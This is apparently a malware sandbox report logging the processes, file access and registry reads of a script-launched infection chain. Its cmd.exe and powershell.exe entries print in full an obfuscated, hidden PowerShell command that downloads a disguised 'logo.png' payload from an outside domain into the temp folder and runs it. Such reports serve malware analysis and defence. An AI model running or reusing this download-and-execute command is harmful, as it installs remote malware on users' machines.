Get Time type = Performance Ctr, time = 18278219798 True 1
Fn
Get Time type = Ticks, time = 128841 True 1
Fn
Get Time type = Performance Ctr, time = 18286572546 True 1
Fn
Get Time type = Ticks, time = 128934 True 1
Fn
Get Time type = Performance Ctr, time = 18294679615 True 1
Fn
Get Time type = Ticks, time = 129153 True 7
Fn
Get Time type = Ticks, time = 129168 True 15
Fn
Get Time type = Ticks, time = 129215 True 7
Fn
Get Time type = Ticks, time = 129246 True 1
Fn
Get Time type = Ticks, time = 129340 True 1
Fn
Get Time type = Ticks, time = 129356 True 2
Fn
Get Time type = Ticks, time = 129371 True 3
Fn
Get Time type = Ticks, time = 129387 True 2
Fn
Get Time type = Ticks, time = 129449 True 1
Fn
Get Time type = Ticks, time = 129558 True 1
Fn
Get Time type = Ticks, time = 129574 True 1
Fn
Get Time type = Ticks, time = 129590 True 1
Fn
Get Time type = Ticks, time = 129714 True 3
Fn
Get Info type = Operating System True 3
Fn
Get Info type = Hardware Information True 1
Fn
Process #13: cmd.exe
62 0
»
Information Value
ID #13
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:25
OS Process Information
»
Information Value
PID 0x538
Parent PID 0x178 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 5E0
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info PowErshelL.eXe type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0x86c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:03 (UTC) True 1
Fn
Get Time type = Ticks, time = 130838 True 1
Fn
Get Time type = Performance Ctr, time = 18493885142 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 3
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #14: powershell.exe
467 0
»
Information Value
ID #14
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:25
OS Process Information
»
Information Value
PID 0x86c
Parent PID 0x538 (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 870
0x 8B0
0x 90C
0x 740
0x 440
0x 74C
0x BBC
Host Behavior
File (131)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 2530 True 1
Fn
Data
Read - size = 542, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (162)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
